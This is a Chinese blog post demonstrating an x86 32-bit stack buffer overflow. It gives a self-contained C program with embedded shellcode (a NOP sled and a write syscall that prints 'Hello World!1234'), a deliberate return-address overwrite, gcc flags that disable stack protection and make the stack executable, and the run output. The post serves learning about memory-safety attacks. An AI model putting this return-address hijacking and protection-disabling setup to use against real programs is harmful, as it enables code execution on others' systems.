x86 32bit模式 堆栈溢出攻击理解

原创 已于 2025-06-23 21:38:43 修改 · 336 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#开发语言

于 2025-06-23 21:36:55 首次发布

#include <stdio.h>           
#include <string.h>       
                          

                          
char codex[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x68\x0a\x0a\x0a\x01\x68\x31\x32\x33\x34\x68\x72\x6c\x64\x21"
    "\x68\x6f\x20\x57\x6f\x68\x48\x65\x6c\x6c\x31\xc0\xb0\x04\x31"
    "\xdb\xb3\x01\x89\xe1\x31\xd2\xb2\x13\xcd\x80\x31\xc0\xb0\x01"
    "\x31\xdb\xcd\x80";           
                             

    
    

/* D:\file_win2linux\stackyichu\payload32.bin (2025/6/22 11:20:20)
   StartOffset: 00000000, EndOffset: 00000017, Length: 00000018 */


unsigned char rawDataxxxx[24+104] = {
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x9B, 0x84, 0x04, 0x08
};


void malicious() {
    printf("\n\033[1;31m!!! 恶意代码被执行 !!!\033[0m\n");
    exit(0);
}

void vulnerable() 
{
    unsigned int *pxx;
    char buffer[8];
    printf("缓冲区地址: \033[1;32m%p\033[0m\n", buffer);
    //gets(buffer); // 危险操作
    memcpy( buffer, rawDataxxxx, 256 );   
    
    pxx    = &buffer[0] + 24;
    //buffer offset = 24的位置是ret的返回地址
    pxx[0] = &buffer[0] + 24 + 8;  //指向本身的下4个字节
    //由于有nop 4、8、12均可
    //pxx[0] = malicious;
    
    printf( "pxx addr = %#x\n", &pxx[0] );
    printf( "pxx[0] = %#x\n", pxx[0] );
    
    //0xffffd6b4   
}

int main() {
    printf("恶意函数地址: \033[1;34m%p\033[0m\n", malicious);
    
    memcpy( &rawDataxxxx[28], codex, sizeof(codex) );
    
    //( (void (*)()) codex )();  // 强制转型为函数指针执行
    vulnerable();
    printf("正常返回\n");
    return 0;
}

//gcc -m32 -fno-stack-protector -z execstack exploit.c -o exploit

//这个其实没啥用了,默认系统是禁止在stack上执行代码的 一执行必爆 
//SEGV {si_signo=SIGSEGV, si_code=SEGV_ACCERR, si_addr=0xffffd6b4} ---
//+++ killed by SIGSEGV (core dumped) +++

运行结果:

./exploit
恶意函数地址: 0x804849b
缓冲区地址: 0xffffd6a4
pxx addr = 0xffffd6bc
pxx[0] = 0xffffd6c4
Hello World!1234


 

dddddppppp123
关注
linux线程堆栈溢出检测,GCC栈溢出检测技术
weixin_31129039的博客
05-12 2064
前一段时间在写ucontext的协程库的时候,遇到了栈空间溢出问题,然后就想到要研究一下堆栈溢出检测的相关技术。欢迎批评指正,如果对汇编有一个语法问题可以看我之前的一片文章,协程:posix::ucontext用户级线程实现原理分析中的汇编基础一节。首先我们直接看一段栈空间溢出的代码:1234567void bob(){int a[4]={0,1,2,3};*(a + 4) = 4;}int ma...
c++堆栈溢出怎么解决_StackOverFlowError 常见原因及解决方法
weixin_39782752的博客
11-26 2270
点击上方"IT牧场",选择"设为星标"技术干货每日送达!每一个 JVM 线程都拥有一个私有的 JVM 线程栈,用于存放当前线程的 JVM 栈帧(包括被调用函数的参数、局部变量和返回地址等)。如果某个线程的线程栈空间被耗尽,没有足够资源分配给新创建的栈帧,就会抛出java.lang.StackOverflowError错误。线程栈是如何运行的?首先给出一个简单的程序调用代码示例,如下所...
x86架构的内存溢出攻击原理演示(加强对计算机运行原理的理解,说明内存溢出的危害)
Sky的专栏
12-06 1200
#PS:要转载请注明出处,本人版权所有 #PS:这个只是 《 我自己 》理解,如果和你的 #原则相冲突,请谅解,勿喷 本文仅用于学习计算机程序运行原理,请不要用作其他违法用途。 前言 内存溢出可以说是我们程序员经常遇到的问题了,但是一般过程中,我们只会处理让程序崩溃的内存溢出,只要程序不崩溃,我们基本不会管的了。这里,我将会演示一下程序内存溢出的严重后果。同时也警示我们自身,写程序一定...
32x86处理器操作模式和寄存器简介
weixin_30666943的博客
10-25 910
①操作模式 一.实模式(Real Mode)   实模式实现的是早期Intel处理器的编程环境,内存寻址方式和8086相同,由16位段寄存器的内容乘以16(10H)当做栈基地址,再加上16位偏移地址形成20位的物理地址,最大寻址空间1MB,最大分段64KB。实模式下可以使用32位指令,且所有的段都是可读、可写和可执行的。   当CPU复位或加点,即电脑重启或开机时,CPU以实模式启动、工作。然...
修改密码导致的堆栈溢出
HighGO
09-21 463
目录 环境 BUG/漏洞编码 症状 触发条件 解决方案 环境 系统平台:Linux x86-64 Red Hat Enterprise Linux 7,银河麒麟U系(CPU飞腾)4,Microsoft Windows (64-bit) 2008 R2,Microsoft Windows (64-bit) 2012 版本:5.6.3,5.6.1,4.3.4,4.3.4.2,4.3.4.3 BUG/漏洞编码 CNNVD-201906-832、 CVE-2019-10164、HGVE-2019
Kali Linux学习笔记—Windows缓冲区溢出攻击
weixin_43653897的博客
11-25 4070
重启后发生变化为true,不发生变化为false OS 必须是true
缓冲区溢出攻击
李洲谊
01-15 7167
概念: 缓冲区——程序用来保存用户输入数据、程序临时数据的内存空间,本质为数组。 缓冲区溢出攻击——攻击者利用程序漏洞,将自己的攻击代码植入有缓冲区溢出漏洞的程序执行体中,改变该程序的执行过程,来获取目标系统的控制权。如果用户输入的数据长度超出了程序为其分配的内存空间,这些溢出的数据就会覆盖程序为其他数据分配的内存空间,形成缓冲区溢出。通过缓冲区溢出攻击,一个用户可在匿名或拥有一般权限用户的情况...
Linux环境下x86-64位缓冲区溢出的深入解析与防范
weixin_42587866的博客
05-09 664
语言 | 内存管理 | 缓冲区溢出防范措施 || Perl | 动态内存分配,通过垃圾收集器回收 | 使用安全函数,检查输入数据的有效性,启用strict和warnings| 汇编 | 直接通过底层指令操作内存 | 结合操作系统保护机制,如NX bit和ASLR |在防范汇编语言的缓冲区溢出攻击方面,开发者除了依赖操作系统提供的安全措施外,还应采取代码审计和静态分析等手段来减少潜在风险。以上内容仅作为示例,展示了Perl和汇编语言在缓冲区溢出攻击中可能的角色。
黑客攻防入门(一)缓冲区(堆栈溢出
不断攀登
07-26 9267
1. 概说缓冲区溢出又叫堆栈溢出(还有许许多的称呼),这是计算机程序难以避免的漏洞,除非有新的设计方式将程序运行的堆栈设计取代。溢出的目的是重写程序的运行堆栈,使调用返回堆栈包含一个跳向预设好的程序的程序(代码),这个程序通常称为shellcode,通过这个shellcode就能获得如期的shell,更有可能获得root。2. 缓冲区溢出的原理计算机中每一个运行中的程序都有相同的内存布局(逻辑布局)
Linux中的基本x86-64bit缓冲区溢出
04-03
总结,理解Linux中的x86-64bit缓冲区溢出是IT安全领域的基础。通过学习溢出原理、防范措施以及如何利用,我们可以更好地保护系统免受此类攻击。阅读"Basic-x86-64bit-Buffer-Overflows-in-Linux.pdf"文档将进一步...
基于CPU硬件的缓冲区溢出攻击的防范技术.pdf
09-24
缓冲区溢出攻击是网络攻击中最常见且危害极大的一种手段,它通过向目标程序的缓冲区写入超出长度的数据,导致内存溢出,进而破坏程序的堆栈结构,使程序执行恶意指令。这种攻击方式能够绕过传统的软件防御机制,如...
Linux x86-64bit缓冲区溢出技巧解析
总结而言,针对Linux环境中的x86-64位基本缓冲区溢出的研究,需要对多种编程语言、体系结构、安全策略以及攻击和防护技术有深入的理解。这包括从理论到实践的全面掌握,以确保能够有效地发现和防止此类漏洞。
堆栈溢出导致崩溃?ESP32中Stack Canary检测技术实战解析
堆栈溢出是嵌入式系统中最常见且危害严重的内存安全漏洞之一。当函数调用过程中局部变量越界写入,覆盖了返回地址或关键上下文数据时,程序流将失控,导致不可预测的行为甚至系统崩溃。在无保护机制的裸机或RTOS环境...
x86-64处理器上的缓冲区溢出攻击:CSAPP Lab3实验解析
5. 防御机制:在了解了攻击方式后,进一步讨论和学习一些防御缓冲区溢出的策略,如栈 Canary、非执行栈(NX Bit)和地址空间布局随机化(ASLR)等。 提交要求: 实验完成后,你需要提交4到5个文本文件,这些文件...
脑机接口(BCI)常用开发语言全景分析:从信号处理到系统构建的技术选型指南
AllenLV的博客
11-23 452
本文系统分析了脑机接口(BCI)开发中的主流编程语言生态。Python凭借丰富的科学计算库成为算法开发的首选;MATLAB以其专业工具箱在科研领域占据优势;C/C++凭借高性能特性在实时处理和硬件交互中发挥关键作用;Java则擅长跨平台应用开发与系统集成。这些语言各具优势,在不同技术环节协同配合,共同推动BCI技术的发展。文章为开发者提供了全面的技术选型参考,有助于根据具体应用场景选择最合适的编程语言组合。
图像重建使用FDK的三维谢普洛根幻影重建(Matlab代码实现)
11-26
【图像重建】使用FDK的三维谢普洛根幻影重建(Matlab代码实现)内容概要:本文介绍了使用FDK算法在Matlab环境中实现三维谢普洛根幻影(Shepp-Logan phantom)图像重建的技术方法,重点展示了图像重建过程中的关键步骤与代码实现。该资源属于一系列图像处理与医学成像技术研究的一部分,涵盖了从投影数据生成到反投影重建的完整流程,帮助读者理解CT图像重建的基本原理与FDK算法的应用细节。; 适合人群:具备一定Matlab编程基础,从事医学图像处理、计算机断层成像(CT)或相关领域研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①学习和掌握FDK算法在三维图像重建中的具体实现;②理解Shepp-Logan幻影模型在仿真成像中的作用;③为医学图像重建、算法验证与教学演示提供可运行的Matlab代码参考; 阅读建议:建议结合Matlab代码逐行调试,理解投影(正弦图)生成与滤波反投影的每一步操作,同时可延伸学习其他重建算法(如FBP
MATLAB潮汐分析工具箱TMD2.05:谐波分析与预测模型实现
11-26
潮汐研究作为海洋科学的关键分支,融合了物理海洋学、地理信息系统及水利工程等多领域知识。TMD2.05.zip是一套基于MATLAB环境开发的潮汐专用分析工具集,为科研人员与工程实践者提供系统化的潮汐建模与计算支持。该工具箱通过模块化设计实现了两大核心功能: 在交互界面设计方面,工具箱构建了图形化操作环境,有效降低了非专业用户的操作门槛。通过预设参数输入模块(涵盖地理坐标、时间序列、测站数据等),用户可自主配置模型运行条件。界面集成数据加载、参数调整、可视化呈现及流程控制等标准化组件,将复杂的数值运算过程转化为可交互的操作流程。 在潮汐预测模块中,工具箱整合了谐波分解法与潮流要素解析法等数学模型。这些算法能够解构潮汐观测数据,识别关键影响要素(包括K1、O1、M2等核心分潮),并生成不同时间尺度的潮汐预报。基于这些模型,研究者可精准推算特定海域的潮位变化周期与振幅特征,为海洋工程建设、港湾规划设计及海洋生态研究提供定量依据。 该工具集在实践中的应用方向包括: - **潮汐动力解析**:通过多站点观测数据比对,揭示区域主导潮汐成分的时空分布规律 - **数值模型构建**:基于历史观测序列建立潮汐动力学模型,实现潮汐现象的数字化重构与预测 - **工程影响量化**:在海岸开发项目中评估人工构筑物对自然潮汐节律的扰动效应 - **极端事件模拟**:建立风暴潮与天文潮耦合模型,提升海洋灾害预警的时空精度 工具箱以"TMD"为主程序包,内含完整的函数库与示例脚本。用户部署后可通过MATLAB平台调用相关模块,参照技术文档完成全流程操作。这套工具集将专业计算能力与人性化操作界面有机结合,形成了从数据输入到成果输出的完整研究链条,显著提升了潮汐研究的工程适用性与科研效率。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
USB cable is bad?(usb接口异常,屏蔽接口)
最新发布
11-26
运维装机、初始化过程中遇到USB接口异常报错。
福特F-550底盘3D模型
11-26
福特F-550底盘3D模型
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值